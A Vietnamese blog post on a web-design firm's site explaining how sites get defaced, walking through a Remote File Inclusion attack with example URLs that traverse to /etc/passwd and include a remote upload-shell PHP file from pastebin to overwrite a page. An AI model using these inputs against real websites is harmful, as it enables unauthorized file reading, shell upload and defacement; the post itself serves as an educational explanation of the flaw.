Các Hacker đã Hack Trang Web Như Nào ? - Slimweb

  • Kho giao diện
  • Tính năng
  • Bảng giá
  • Hướng dẫn
  • Kiến thức marketing
ĐĂNG KÝĐĂNG NHẬP
  • New item
Các hacker đã hack trang web như nào ? Lượt xem: 4732Đa số mọi người đã từng thấy 1 trang web bị hack và thay đổi giao diện là anonymous, hacked by abc, ...... Vậy làm thế nào các hacker có thể làm được điều đó? Cho tới hiện tại mình biết được 3 cách:
  1. Remote File Include (RFI)
  2. SQL injection.
  3. Cross-site Scripting.
Đặc điểm cả 3 đều thực hiện Upload Shell hay còn gọi là tải file độc hại lên sever thậm chí php, html, js, .....Đầu tiên ta đi đến cách đầu tiên: Remote File Include (RFI)
  • Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp tin độc hại bằng cách sử dụng chức năng “include”.
  • Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dự liệu độc hại.
Nói lý thuyết suông thì khá mơ hồ, các bạn xem video này sẽ tái hiện lại một cách chi tiết nhé: https://www.youtube.com/watch?v=D23yGtv3ZUY&feature=youtu.be Ví dụ ta có site: abc. com/index.php?page=photos.php Giải thích như sau: cái trang php kia sẽ đọc file từ photos.php mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ lợi dụng lỗ hổng này để khai thác và đọc nhiều file nhạy cảm hơn password Đến đây ta thử thành đường dẫn google xem như nào.
abc. com/index.php?page=http:// google.com
Tada! Hiện ra nguyên trang search google luôn. Vậy là index.php không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd
abc. com/index.php?page=etc/passwd
Kết quả không show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng ../
abc. com/index.php?page=../etc/passwd
Vẫn không hiện. Tiếp tục path.
abc. com/index.php?page=../../etc/passwd
Tada! Nguyên passwd đã lộ ra sau 2 lần thử .    Chưa dừng lại ở đây. Nếu có thể đọc được bất kì file gì. Sao ta lại không thử đọc 1 file với mục đích upload file lên sever. Chuẩn bị 1 file uploadShell.php. Copy code vào pastebin nhằm mục đích lấy link. Sau 1 hồi ta được 1 link với code php để upload file. Sau 1 hồi ta được kết quả:
abc. com/index.php?page=https:// pastebin. com/xyz
Ok up file đã hiện lên! Giờ chỉ cần tới công đoạn up file bất kì nào lên thôi tùy mục đích của hacker. Trong video mình muốn ghi đè file dispo_cal.php nên mình đã tạo 1 file php với tên y chang nhưng source code là trang web giao diện thông báo trang web này đã bị hack. Và cuối cùng thành công! Hoàn thành thử thách.   Chia sẻ Nguyễn Quốc Khánh - J2Team Quay về Trang chủ

Block blog

Content Marketing Email marketing Facebook marketing Google Adwords Growth hacking Internet marketing Khởi nghiệp Startup

Bài viết liên quan

Bao nhiêu tiền cho một website đầu ngành bất động sản ? 20/04/2020 Các nguồn tài nguyên về Color picker đáng để tham khảo 03/08/2019 Chia sẻ nhiều nguồn tài nguyên về CSS 30/07/2019 4 nguyên lý thiết kế website marketer cần biết 11/07/2019 Tối ưu landing page giúp tăng tối ưu hiệu quả quảng cáo Google Ads ngành Bất Động Sản 13/05/2019 19 câu hỏi kiểm tra chất lượng Landing Page giúp tăng tỷ lệ chuyển đổi ngay 01/04/2019 THAM GIA NHÓM

Không biết gì vẫn có thể thiết kế web sau 3 giờ

Khóa học thiết kế web, blog và landing page dành cho startup, marketer, designer và developer

ĐĂNG KÝ NGAY

Trụ sở

Tầng 7, tòa nhà số 18 Miếu Đầm, Q.Nam Từ Liêm, Hà Nội

Tư vấn

Cố định: 024.3206.6000 Mobile: 096.2629.444

Hỗ trợ

Email: info@slimsoft.vn Hotline (giờ hành chính): 096.2629.444

Dành cho Slimer

Kênh hỗ trợ dành riêng cho Slimer:http://hotro24.com

  • Kho giao diện
  • Tính năng
  • Bảng giá
  • Hướng dẫn
  • Kiến thức marketing
  • Đăng ký
  • Đăng nhập

Từ khóa » Hack Trang Web Bất Kỳ